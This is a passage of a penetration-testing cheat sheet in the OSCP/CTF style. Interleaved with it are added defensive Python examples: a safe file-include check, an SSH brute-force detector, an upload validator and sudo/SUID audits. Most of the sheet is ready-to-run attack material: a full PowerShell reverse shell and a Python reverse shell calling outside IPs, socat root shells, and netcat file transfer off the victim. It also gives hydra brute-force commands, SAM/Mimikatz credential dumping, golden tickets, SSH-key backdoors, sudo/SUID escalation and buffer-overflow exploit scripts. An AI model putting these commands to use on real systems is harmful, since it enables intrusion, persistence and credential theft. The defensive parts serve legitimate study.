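    # stands in for /etc/passwd or /var/log/apache2/access.log (constructed content)
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash")
    return root


def secret_path(root: str) -> str:
    """Absolute path of the constructed secret, i.e. what page=/etc/passwd would be."""
    return os.path.join(root, "secret.txt")


def include_vulnerable(root: str, page: str) -> str:
    """include($_GET['page']) equivalent: the parameter goes straight into the path."""
    # os.path.join discards everything before an absolute component, so
    # page="/etc/passwd" leaves the web root entirely; "../" walks out of it.
    path = os.path.join(root, "pages", page)
    with open(path) as f:
        return f.read()


def include_safe(root: str, page: str) -> str:
    """Refuse URLs, resolve the real path, require it to stay inside pages/ with a .php suffix."""
    if "://" in page:
        raise ValueError("remote include refused")             # RFI
    base = os.path.realpath(os.path.join(root, "pages"))
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the pages directory")   # LFI / traversal / absolute path
    if not target.endswith(".php"):
        raise ValueError("only .php pages may be included")    # blocks logs, /etc/passwd
    with open(target) as f:
        return f.read()


def leaks(root: str, page: str) -> bool:
    """True if include_safe would serve the constructed secret (it never should)."""
    try:
        return "root:x:0:0" in include_safe(root, page)
    except (ValueError, FileNotFoundError):
        return False


if __name__ == "__main__":
    root = build_webroot()
    print("vulnerable, ../secret.txt :", include_vulnerable(root, "../secret.txt"))
    print("vulnerable, absolute path :", include_vulnerable(root, secret_path(root)))
    print("safe, home.php            :", include_safe(root, "home.php"))
    print("safe leaks via traversal  :", leaks(root, "../secret.txt"))
```

An allowlist of page names (a dict from parameter value to file) is simpler still and is what to prefer when the set of includable pages is fixed; the realpath check is for the case where the directory is the allowlist.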

Enumeration Checklist (cont)

Exploit SUID & Backdoor

PATH of the SUID binary and the matching GTFOBins command together to gain root. ssh-keygen, then append the public key to .ssh/authorized_keys: leaving an SSH key in authorized_keys on a box can be a useful backdoor.

Hash-id & crack hash online, otherwise use hashcat or JTR

MD5 hashing: CrackStation

Hydra crack login page

Provide the full path, like /index.php; mostly it won't work otherwise. When providing the path, test /index.php to identify that PHP is running.

hydra 10.10.10.227 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form '/admin/index.php:user=admin&pass=^PASS^:Username or password invalid' -f

(^PASS^ is where hydra substitutes each candidate; the string after the last colon is the failure message to match, and -f stops at the first hit.)

Sudo gives you permission to execute scripts

If the script is writable, remove it and replace it with a shell.

Brute force after you get usernames or a password list hint

hydra, once you have usernames

Port Knocking: if you see numbers as a hint it might be port knocking

Knock on the ports mentioned to open hidden ports:

for x in 1 3 5; do nmap -Pn --max-retries 0 -p $x 10.10.63.86; done
nmap -r -p1,3,5 10.10.17.17

SQL & XSS Indicators

For XSS, target text boxes and URL parameters; XSS might also get triggered on another page. For SQL, test the URL (like an id) or login pages.


Enumeration Checklist (cont)

SMTP: runs on port 25. Nmap has scripts like --script smtp-commands; also search HackTricks and Hacking Articles for possible enumeration techniques. Understand the difference.

139 & 445 SMB (for more refer to HackTricks): check null session, list shares, enum4linux: enum4linux -a 10.0.2.19
smbclient -L <ip> to list shares, -N to force a connection without a password, and smbclient //<ip>/<share-name> to open a share.

Enumeration and understanding of the scenario are very important aspects. Think: if you need something like credentials, is there any way to access them from the options currently available?

Linux Commands

Command Name / Syntax

Vim text editor: i for insert, esc to exit insert, :wq to quit and save, :%d to delete all lines

Hashcat (crack password hash): hashcat -a 0 -m 500 hash /root/Downloads/rockyou.txt --force

Transfer files via nc & base64 (move files): on victim: nc -nv 10.0.2.5 5555 < access.exe On attacker: nc -nlvp 5555 > access.exe base64 <filename> Save the encoding in a file; base64 -d <filename_base64_encoding>

Scp (secure copy files): to receive files from the target: scp username@remote:/file/to/send /where/to/put

Linux Commands (cont)

Gobuster (dir buster): gobuster dir -u http://10.10.203.157:3333/ -w /usr/share/wordlists/dirb/common.txt

Processes running (under which user): ps aux

SUID (set owner user ID upon execution) binary: find / -perm -u=s -type f 2>/dev/null Instead of rwx -> rws. Example: the SUID bit is set on the binary file passwd, as another user should be able to change their password but the user won't have direct access to that file, so the binary runs with root privileges.

Burp Suite (check acceptable file ext): send the request to Intruder and run a Sniper attack to verify whether the extension is acceptable or not. A Python script importing the requests library can also be used.

Word count (count the number of lines in a file): wc -l yourTextFile

Whatweb: whatweb <ip> The WhatWeb tool is used to identify the different web technologies used by the website.

Fim (view images from the terminal): fim <image_name>

Curl (change user agent (browser type renders content) and follow redirection): curl -A "J" -L "http://10.10.231.116"

Python server to transfer files from remote to local: python3 -m http.server <port_no> and access it using the IP of the remote machine:port_no


Linux Commands (cont)

Python server to transfer files from local to remote: wget http://<ur-ip>:<port>/<file>

Extract zip: 7z e <zip_name.zip>

Crack zip: locate zip2john; zip2john <zipfile> > output.txt; john output.txt
fcrackzip -u backups.zip -D -p /usr/share/wordlists/rockyou.txt -v

Move multiple files to a directory: mv file1 file2 folder_name

Fuzz directory: wfuzz -c -w common.txt --sc 200 -u "http://10.10.10.191/FUZZ.txt" -t 100
wfuzz -z file,big.txt -d "breed=FUZZ" -u http://shibes.xyz/api.php

Find flags .txt: find / -type f -name 'user.txt' 2>/dev/null

Hydra (bruteforce HTTP POST form): hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed" Specify the error string shown when login fails.

Hydra (bruteforce FTP): hydra -l ftpuser -P passlist ftp://10.10.50.55

FTP bruteforce: hydra -l chris -P /usr/share/wordlists/rockyou.txt -vV ftp://10.10.91.104

POP3 bruteforce: hydra -l "boris" -P /usr/share/wordlists/fasttrack.txt -f 10.10.186.225 -s 55007 pop3 -V

Linux Commands (cont)

John the Ripper (crack SSH) via private-key passphrase bruteforce: python /usr/share/john/ssh2john.py codes > crack.txt; john --wordlist=/root/Downloads/rockyou.txt crack.txt

ssh (login through private key): ssh -i codes david@10.10.10.165 -p 22

SSH bruteforce for password: hydra -f -l john -P list ssh://10.10.24.200
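The hydra entries above (HTTP form, FTP, POP3 and SSH) all produce the same footprint on the target: many authentication failures from one source in a short window, sometimes followed by a success. The Python script below is an added example (not from the cheat sheet) of the detection side for SSH: it parses sshd lines in /var/log/auth.log syslog format, applies a sliding window per source IP, and reports sources that exceed a failure threshold together with the usernames tried and whether a login succeeded afterwards. The log lines, the threshold of 5 failures and the 60-second window are constructed assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in auth.log syslog format (year omitted, as in the real file).
SAMPLE_AUTH_LOG = """\
Feb 27 10:00:01 web01 sshd[2301]: Failed password for john from 10.10.24.200 port 51000 ssh2
Feb 27 10:00:01 web01 sshd[2302]: Failed password for john from 10.10.24.200 port 51001 ssh2
Feb 27 10:00:02 web01 sshd[2303]: Failed password for invalid user admin from 10.10.24.200 port 51002 ssh2
Feb 27 10:00:02 web01 sshd[2304]: Failed password for john from 10.10.24.200 port 51003 ssh2
Feb 27 10:00:03 web01 sshd[2305]: Failed password for john from 10.10.24.200 port 51004 ssh2
Feb 27 10:00:03 web01 sshd[2306]: Failed password for john from 10.10.24.200 port 51005 ssh2
Feb 27 10:00:04 web01 sshd[2307]: Accepted password for john from 10.10.24.200 port 51006 ssh2
Feb 27 10:05:00 web01 sshd[2400]: Failed password for alice from 192.168.2.5 port 40000 ssh2
Feb 27 10:05:30 web01 sshd[2401]: Accepted publickey for alice from 192.168.2.5 port 40001 ssh2
"""

LINE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\S+) port \d+'
)


def parse(text, year=2021):
    """Return (timestamp, ip, user, result) tuples for every sshd auth line that parses."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
            events.append((ts, m.group("ip"), m.group("user"), m.group("result")))
    return events


def find_bruteforce(events, threshold=5, window_s=60):
    """Return {ip: (max_failures_in_window, users_tried, success_after_failures)}
    for every source with >= threshold failures inside any window_s-second window."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in events:
        by_ip[ip].append((ts, user, result))
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [(ts, user) for ts, user, r in evs if r == "Failed"]
        # Sliding window over the failure timestamps: widest run within window_s.
        best = 0
        start = 0
        for end in range(len(fails)):
            while (fails[end][0] - fails[start][0]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            last_fail = max(ts for ts, _ in fails)
            # A success after the burst is the case that needs an incident, not just a block.
            success_after = any(r == "Accepted" and ts >= last_fail for ts, _, r in evs)
            alerts[ip] = (best, sorted({u for _, u in fails}), success_after)
    return alerts


if __name__ == "__main__":
    for ip, (n, users, success) in find_bruteforce(parse(SAMPLE_AUTH_LOG)).items():
        print(f"{ip}: {n} failures in window, users={users}, "
              f"{'SUCCESS AFTER FAILURES' if success else 'no success seen'}")
```

The same sliding-window logic applies to FTP and POP3 daemons; only the line regex changes. A single failure from a source that later authenticates with a key (alice above) stays below the threshold and is not reported.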

Bruteforce JPG for hidden data (steghide passphrase): stegcracker file list.txt

TELNET interacting with POP3: connect to the mail server using telnet with the IP or DNS name of the server on port 110, then use the POP3 commands.

PNG magic number & hexedit: 89 50 4E 47 0D 0A 1A 0A hexedit <file>; in hexedit, ctrl+x to save
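The PNG signature above, and the earlier Burp Suite entry about checking which upload extensions a site accepts, are two sides of the same control: an upload handler that trusts the extension can be fed code with an image name, and one that trusts only the first bytes can be fed a file with a real PNG header followed by code. The Python below is an added example (not from the cheat sheet) of a server-side validator that requires the extension and the content signature to agree and rejects image data that carries a PHP open tag. The signatures other than PNG are standard published values; the allowlist and sample uploads are constructed for the demo.

```python
import os

# Magic numbers: PNG is the one given on the page, the rest are standard signatures.
SIGNATURES = {
    "png": [bytes.fromhex("89504E470D0A1A0A")],
    "jpg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "pdf": [b"%PDF-"],
    "zip": [b"PK\x03\x04"],
}

ALLOWED_UPLOAD_TYPES = {"png", "jpg", "gif"}   # assumed policy for an image upload endpoint


def sniff_type(data):
    """Return the type whose signature matches the start of data, or None."""
    for kind, magics in SIGNATURES.items():
        if any(data.startswith(m) for m in magics):
            return kind
    return None


def validate_upload(filename, data):
    """Accept only when extension and content signature agree and the type is allowlisted.
    Returns (ok, reason)."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    ext = {"jpeg": "jpg"}.get(ext, ext)
    if ext not in ALLOWED_UPLOAD_TYPES:
        return False, f"extension .{ext} not allowed"
    kind = sniff_type(data)
    if kind is None:
        return False, "unrecognised content signature"
    if kind != ext:
        return False, f"content is {kind} but extension says {ext}"
    # A valid image header does not prove the file is only an image: reject embedded code.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag in image data"
    return True, "ok"


# Constructed sample uploads (not real files).
PNG_HEADER = bytes.fromhex("89504E470D0A1A0A") + b"\x00\x00\x00\rIHDR"
SAMPLES = {
    "cat.png": PNG_HEADER + b"\x00" * 16,
    "page.php": b"<?php echo 1; ?>",
    "page.png": b"<?php echo 1; ?>",              # code with an image extension
    "poly.png": PNG_HEADER + b"<?php echo 1; ?>",  # real PNG header followed by code
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
    "renamed.jpg": PNG_HEADER,                     # PNG bytes under a .jpg name
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, validate_upload(name, blob))
```

Checking both the extension and the signature is what closes the gap Burp Intruder probes for: a name-only check lets `page.png` through, and a signature-only check lets `poly.png` through.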

MySQL cheat sheet: MySQL commands; use ; to terminate each mysql line.

Find a specific file with readable permission: find / -type f -readable 2>/dev/null | grep README.txt

Sudo -l execution: (sly) /bin/cat /home/sly/README.txt then sudo -u sly /bin/cat /home/sly/README.txt So you can see the user was able to execute that command. We have to use sudo specifying <usr> <binary path> <file> to execute.

Nmap scanning, how it works: if you run nmap -sC -sV -Pn ip you can see the results; if you specify -p 1-100 it will show info for those ports, because they are all scanned as open or closed.


Linux Commands (cont)

To only grab banners: nmap -p 1-100 <IP> --script banner Telnet is a communication tool; it gets the banner or the protocol info: if it's HTTP it shows HTTP info, if it's SSH it shows the SSH RSA info.

Escape shells via programming: escaping a shell via a programming language, like Ruby's irb(main)

https://mzfr.github.io/linux-priv-esc
https://linuxize.com/post/how-to-use-linux-ftp-command-to-transfer-files/
https://www.hostingmanual.net/zipping-unzipping-files-unix/

GTFOBins

Usage / Syntax

Vim text editor: https://gtfobins.github.io/gtfobins/vim/

Service exploitation: exploiting any service which is running as root. Also provide the file path to the service's executable.

To exploit a service: execute it, for example <path_to_the_service> -> /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service You can get this from GTFOBins but need to find out the path.

GTFOBins (cont)

/systemctl (SUID bit set): service is a "high-level" command used to start, restart, stop and get the status of services in different Unixes and Linuxes. service is adequate for basic service management, while directly calling systemctl gives greater control options. Our target system allows any logged-in user to create a system service and run it as root!

Sudo -l: sudo -l shows you exactly which commands you are authorized to use.

(ALL, !root) NOPASSWD: /usr/bin/vi The !root is a CVE vulnerability which can be exploited through sudo -u#-1 <path_where_user_can_execute_sudo_command>

If sudo -l specifies Vim: use esc and then :! as we are going to type a system command, and then specify the executable sh (:!sh)
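Reading `sudo -l` output by eye is how the entries above are found; the same rules can be audited mechanically before an attacker does. The Python below is an added example (not from the cheat sheet) that parses the rule lines of `sudo -l`, then flags the patterns this section describes: `NOPASSWD`, an unrestricted `ALL` command list, a negated runas list such as `(ALL, !root)`, and editors or pagers that can drop to a shell (vi/vim as on the page, plus a small assumed set of similar binaries). The sample output and the set of shell-capable binaries are constructed for the demo.

```python
import re

# Constructed "sudo -l" output in the shape sudo prints (not from a real host).
SAMPLE_SUDO_L = """\
Matching Defaults entries for dev on web01:
    env_reset, mail_badpass

User dev may run the following commands on web01:
    (ALL, !root) NOPASSWD: /usr/bin/vi
    (root) NOPASSWD: /usr/bin/systemctl restart nostromo.service
    (sly) /bin/cat /home/sly/README.txt
    (ALL) ALL
"""

# "(runas) TAG: TAG: command args"
RULE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$')

# Editors/pagers with a built-in shell escape. Illustrative subset, assumed here.
SHELL_ESCAPE_BINS = {"vi", "vim", "nano", "less", "more", "man"}


def parse_sudo_l(text):
    """Return one dict per rule line: runas spec, tags (NOPASSWD etc.) and the command."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = RULE.match(line)
        if m:
            tags = [t.strip(": ").upper() for t in m.group("tags").split(":") if t.strip()]
            rules.append({"runas": m.group("runas").strip(),
                          "tags": tags,
                          "cmd": m.group("cmd").strip()})
    return rules


def audit(rules):
    """Return (cmd, finding) pairs for rules a defender should tighten."""
    findings = []
    for r in rules:
        cmd = r["cmd"]
        binary = "ALL" if cmd == "ALL" else cmd.split()[0].rsplit("/", 1)[-1]
        runas_users = [u.strip() for u in r["runas"].split(",")]
        if cmd == "ALL":
            findings.append((cmd, "unrestricted command list as " + r["runas"]))
        if "NOPASSWD" in r["tags"]:
            findings.append((cmd, "runs without a password"))
        if "ALL" in runas_users and any(u.startswith("!") for u in runas_users):
            # Denying one user from ALL is a blocklist; prefer naming the allowed user.
            findings.append((cmd, "negated runas list (ALL, !user) is not a reliable restriction"))
        if binary in SHELL_ESCAPE_BINS:
            findings.append((cmd, f"{binary} can spawn a shell; restrict it or use sudoedit"))
    return findings


if __name__ == "__main__":
    for cmd, why in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{cmd}: {why}")
```

The `/bin/cat /home/sly/README.txt` rule produces no finding: a single non-interactive binary with fixed arguments is the shape a sudoers entry should have.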

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

The project collects legitimate functions of Unix binaries that can be abused to break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks.

Windows Enumeration

Command / Usage


Windows Enumeration (cont)

Biggest enumeration hint: "This is going to sound like I'm being disingenuous, but you need to learn how to figure things out. Each machine might require a tool you haven't even heard of yet, but you have to figure that part out. Knowing what and how to Google is arguably the most valuable skill."

Hint - Users: names are important! They might be a subdomain; read and understand, they might be a username or password.

Hint - Finding the right file: the service found at the start of the box can later be checked for a conf or other file holding a username and password.

GitHub workflow: create a branch, push the file into that branch, click on the uploaded file and open a pull request. Completing the pull request is the same as a commit; approve and complete the merge.

Windows Enumeration (cont)

Active Directory (TryHackMe room): a Windows domain allows management of large computer networks. They use a Windows server called a DC (domain controller). A DC is any server that has the Active Directory Domain Services role. DCs respond to authentication requests across the domain. DCs have the tools AD (Active Directory) and GP (Group Policy). AD contains objects and OUs (Organizational Units). GP contains GPOs (Group Policy Objects) that manage settings for AD objects.

NetBIOS port 137: HackTricks enumeration

SMB port 139: smbclient -L <ip> yields information such as the share name and its type.

SVN port no 3690, and it's simply version tracking with Subversion (SVN): first view the log: svn log svn://worker.htb/ Now you can view the difference between those commits: svn diff svn://htb/ -r 2

Subversion commands: http://www.yolinux.com/TUTORIALS/Subversion.html#SVNPROPERTIES

SVN: "Subversion cannot find a proper .svn directory in there."

Reverse shells: https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/


Windows Enumeration (cont)

PowerShell reverse shell:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Windows interactive shell (ASPX shell by LT): https://github.com/xl7dev/WebShell/blob/master/Aspx/ASPX%20Shell.aspx

Dumping passwords and hashes on Windows: this most probably requires administrative permissions. Windows stores passwords in the SAM (Security Account Manager). Passwords are stored differently depending on the operating system. There are two authentication mechanisms that produce two hashes: LAN Manager (LM) and NT LAN Manager (NTLM), the latter from Vista onwards.

Windows Enumeration (cont)

Credential dumping: SAM (tools): the Security Accounts Manager (SAM) is a registry file in Windows NT and later versions up to the most recent Windows 8. It stores users' passwords in a hashed format (LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords. SAM is found in C:\Windows\System32\config, and the hashed passwords saved in SAM can be found in the registry: open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SAM. Windows 7: SamDump2, PwDump7, Metasploit Framework. Windows 10: Mimikatz, Impacket, Metasploit Framework (hashdump and load_kiwi (mimikatz)). The Registry is essentially a database. Its information is stored on disk for the most part, though dynamic information also exists in the computer's memory.

Windows Priv. Esc. || Metasploit Module

Name / Usage

Microsoft Remote Desktop (MSRDP): port no 3389


Windows Priv. Esc. || Metasploit Module (cont)

Local Security Authority Subsystem Service: the lsass service. The service responsible for authentication within Windows. We generally use the migrate command in Metasploit to move into a process that can communicate with lsass.exe and has the permissions needed to interact with it.

To exploit lsass we need to be: same architecture (living in), same permissions. In order to interact with lsass we need to be 'living in' a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass.

Printer service: spoolsv.exe, the printer spool service

Living in a process: often when we take over a running program we ultimately load another shared library into the program (a DLL) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.

msfconsole >> search <Program/Process>: fire up the msfconsole terminal and search for a vulnerable exploit of a program or process.

Select an exploit: select using #use <no>. Remember to use #search options and set them accordingly.

Windows Priv. Esc. || Metasploit Module (cont)

Fire the exploit: #run them after setting up options

Metasploit command center: #getuid (user-id) #sysinfo #getprivs #migrate -N PROCESS_NAME

Local exploit vs remote exploit: a remote exploit works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A local exploit requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator.

Local exploit (Metasploit): run post/multi/recon/local_exploit_suggester Results for potential escalation exploits. Local exploits require a session to be selected.

Background a session (some privilege): #background This provides us with a session number which can be used in combination with another exploit to escalate privileges.

Mimikatz (password dumping tool): #load kiwi (Kiwi is the updated version of Mimikatz). It expands the options; use #help to view them.


Windows Priv. Esc. || Metasploit Module (cont)

Mimikatz allows us to create what's called a golden ticket, allowing us to authenticate anywhere with ease: golden_ticket_create Golden ticket attacks are a function within Mimikatz which abuses a component of Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.

Windows NTLM hash crack: hashcat -a 0 -m 1000 crack.hash /usr/share/wordlists/rockyou.txt

Privilege escalation

Usage / Syntax

Fast Linux priv. esc. checklist: uname -a, id, sudo -l, /etc/crontab, SUID, linpeas, linux-exploit-suggester, pspy, netstat, capabilities, search directories for juice, use ps aux | grep root to look at any services that are running as root. Password spray. Config files of running services might leak creds.

C program: make <.c program> then ./ to execute

SCP (secure copy files) from local to remote machine: scp <filename> username@ip:<location>

Python server: python3 -m http.server

Unix info about your specific Linux distribution: lsb_release -a; uname -a

Use echo "text" into a file: echo "text" > output.txt

Privilege escalation (cont)

Python reverse shell with newline char:
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.157",1235)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

View cronjobs: cat /etc/crontab

Exploiting sudo -l user NOPASSWD:ALL: sudo -i -u <user>

Sudo knowledge: su asks for the password of the user "root". sudo asks for your own password (and also checks if you're allowed to run commands as root, which is configured through /etc/sudoers -- by default all user accounts that belong to the "admin" or "sudo" groups are allowed to use sudo). sudo -s launches a shell as root, but doesn't change your working directory. sudo -i simulates a login into the root account: your working directory will be /root, and root's .profile etc. will be sourced as if on login.

Sudo -l (exploiting sudo rights): Super User Do, root-privilege task https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/

After SSH


Privilege escalation (cont)

id: the id command in Linux is used to find out the user and group names and numeric IDs (UID or group ID) of the current user or any other user on the server.

id shows 108(lxd): LXD privilege escalation

Weak file permission: ls -l <file> : check permissions

Readable /etc/shadow: crack the passwd, SHA-512

Writeable /etc/shadow: create and replace the passwd: mkpasswd -m sha-512 newpasswordhere

Writeable /etc/passwd: create and replace the passwd: openssl passwd newpasswordhere

.sudo_as_admin_successful: means that the user can run something as root. Check SUID and sudo -l; refer to the checklist.
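The weak-file-permission entries above and the earlier `find / -perm -u=s -type f 2>/dev/null` entry in Linux Commands are both stat-based checks, so one audit can cover them from the defender's side. The Python below is an added example (not from the cheat sheet): it lists setuid/setgid regular files under a root and diffs them against a baseline, so a planted or newly setuid binary shows up, and it compares the mode bits of sensitive files against a maximum mode policy so a world-readable shadow file or writable passwd file is reported. The policy, the baseline and the temporary demo tree are constructed assumptions; the `prefix` argument exists so the mode check can run against an extracted image rather than the live /etc.

```python
import os
import stat
import tempfile

# Constructed policy: maximum permission bits each sensitive file may carry.
SENSITIVE = {
    "/etc/passwd": {"max_mode": 0o644},
    "/etc/shadow": {"max_mode": 0o640},
    "/etc/sudoers": {"max_mode": 0o440},
}


def find_suid(root):
    """Regular files under root with the setuid or setgid bit set
    (the same set as: find ROOT -type f -perm -u=s, plus -perm -g=s)."""
    found = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue           # unreadable or vanished: skip, as 2>/dev/null would hide it
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.add(path)
    return found


def unexpected_suid(root, baseline):
    """(new_suid_files, missing_baseline_files): new entries mean a planted or
    newly privileged binary; missing ones mean the baseline is stale or tampered."""
    current = find_suid(root)
    return sorted(current - baseline), sorted(baseline - current)


def check_modes(policy, prefix=""):
    """Report (path, actual_mode, excess_bits) for files exceeding the policy's max mode."""
    problems = []
    for rel, rule in policy.items():
        path = prefix + rel
        try:
            mode = stat.S_IMODE(os.stat(path).st_mode)
        except FileNotFoundError:
            continue
        extra = mode & ~rule["max_mode"]
        if extra:
            problems.append((path, oct(mode), oct(extra)))
    return problems


def make_demo_tree():
    """Constructed fixture: a temp tree with a normal binary, a setuid binary and a
    world-readable copy of /etc/shadow. Returns (root, suid_path, shadow_path)."""
    root = tempfile.mkdtemp(prefix="fsaudit-")
    os.makedirs(os.path.join(root, "etc"))
    os.makedirs(os.path.join(root, "usr", "bin"))
    plain = os.path.join(root, "usr", "bin", "ls")
    suid = os.path.join(root, "usr", "bin", "passwd")
    shadow = os.path.join(root, "etc", "shadow")
    for p in (plain, suid, shadow):
        with open(p, "wb") as f:
            f.write(b"demo\n")
    os.chmod(plain, 0o755)
    os.chmod(suid, 0o4755)     # rws r-x r-x
    os.chmod(shadow, 0o644)    # readable by everyone: a policy violation
    return root, suid, shadow


if __name__ == "__main__":
    root, suid, shadow = make_demo_tree()
    print("setuid files:", sorted(find_suid(root)))
    print("new / missing vs empty baseline:", unexpected_suid(root, set()))
    print("mode problems:", check_modes(SENSITIVE, prefix=root))
```

Run against a real host, `find_suid("/")` with a baseline captured at build time and `check_modes(SENSITIVE)` with no prefix give the two checks this section of the cheat sheet relies on from the attacker's side.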

Socat (more powerful version of nc): we can use socat to send ourselves a root shell. Attacking machine: socat file:`tty`,raw,echo=0 tcp-listen:1234 Remote machine: sudo socat tcp-connect:<your-ip-address>:1234 exec:bash,pty,stderr,setsid,sigint,sane Socat reverse shell as root: https://www.maritimecybersecurity.center/linux-for-pentester-socat-privilege-escalation/

Privilege escalation (cont)

Reverse shell (one-liners): reverse shell: 1) Bash (running Linux), 2) Python, 3) Nc, 4) PHP reverse shell script

Linux privilege escalation checklist: guide to follow if stuck

Linux PrivEsc: kernel exploits: uname -a. Execute a command as root: sudo -l. Find binaries we can execute as root: SUID. Check cronjobs; monitor the Linux system: pspy64

Few things to remember: if root is executing a file and we can access that file, then we can get a reverse shell; mostly cron jobs can be exploited like this. Or, if you can execute the file as root but can't write to it, then delete it and execute to get a reverse shell.

Linux PrivEsc via capability (getcap): to identify if any exist, type getcap -r / 2>/dev/null


Buffer Overflows (OSCP procedure)

Steps / Commands

References: Cybermentor BoF Notes, Buffer Overflow Guide

1. SPIKING | Testing commands to find the vulnerable one: we are trying to test multiple commands and find what's vulnerable. For example, for the TRUN function:
(root@Kali)-[~/Koth] # cat spike.spk
    s_readline();
    s_string("TRUN ");
    s_string_variable("0");

Attacking machine: nc -nv 10.0.2.14 9999 then generic_send_tcp 10.0.2.14 9999 spike.spk 0 0 Look out for a buffer overflow in the registers.

2. FUZZING | Crash the application: we will now go ahead and attack that command specifically. In fuzzing, when the registers get crashed and we see TRUN being affected, we stop the exploit via ctrl+c and get an estimate of at what byte count TRUN got affected, e.g. 2800 bytes -> we can round off and make it 3000.

    #!/usr/bin/python
    import sys, socket
    from time import sleep

    buffer = 'A' * 100

    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(('10.0.2.14', 9999))
            s.send(('TRUN /.:/' + buffer))
            s.close()
            sleep(1)
            buffer = buffer + 'A' * 100
        except:
            print("Fuzzing crashed at %s bytes" % str(len(buffer)))
            sys.exit()

Buffer Overflows (OSCP procedure) (cont)

Goal: to know approximately where we crashed, at what byte count. Once it breaks, it prints out an exception: "Fuzzing crashed at X bytes". Now we will be finding where the EIP is at; we are going to use a tool.

3. FINDING THE OFFSET | Find EIP: first we will use the pattern_create msf tool; we create 3000 bytes, then run exploit.py. After that we will use pattern_offset, specifying the value of EIP (which will be within those 3000 bytes), to grab the offset.

Tool: Pattern Create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

    #!/usr/bin/python
    import sys, socket

    offset = ('')   # paste the pattern_create output here

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.0.2.14', 9999))
        s.send(('TRUN /.:/' + offset))
        s.close()
    except:
        print("Error Connecting to the Server")
        sys.exit()

Tool: Pattern Offset: pattern_offset.rb -l 3000 -q <VALUE/FINDING from EIP>

Goal: this offset information is critical because now we know that at this byte we can control the EIP. Now we will overwrite it with specific bytes.


Buffer Overflows (OSCP procedure) (cont)

4. OVERWRITING THE EIP | Control ESP: we discovered that the offset is at 2003 bytes; it means there are 2003 bytes right before EIP begins.

    #!/usr/bin/python
    import sys, socket

    shellcode = 'A' * 2003 + 'B' * 4

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.0.2.14', 9999))
        s.send(('TRUN /.:/' + shellcode))
        s.close()
    except:
        print("Error Connecting to the Server")
        sys.exit()

Goal: control this EIP. Now TRUN got filled with a bunch of As: EBP (bottom) is filled with 41414141, EIP (return) is filled with 42424242. We only sent 4 bytes of Bs and they all landed in EIP.

5. FINDING THE BAD CHARACTERS in the hex dump; note them, and \x00 is always a bad char: manually identify bad chars. After running the script, EIP will be the same 42424242 but we will work on the hex dump to find the bad ones. Sequence flow: 01-09 -> 0a-0f -> 10-19 -> 1a-1f -> 20-29 -> 2a-2f and so on. Add the string with the bad chars + "blacklist" to identify the end of the buffer.

Buffer Overflows (OSCP procedure) (cont)

    #!/usr/bin/python
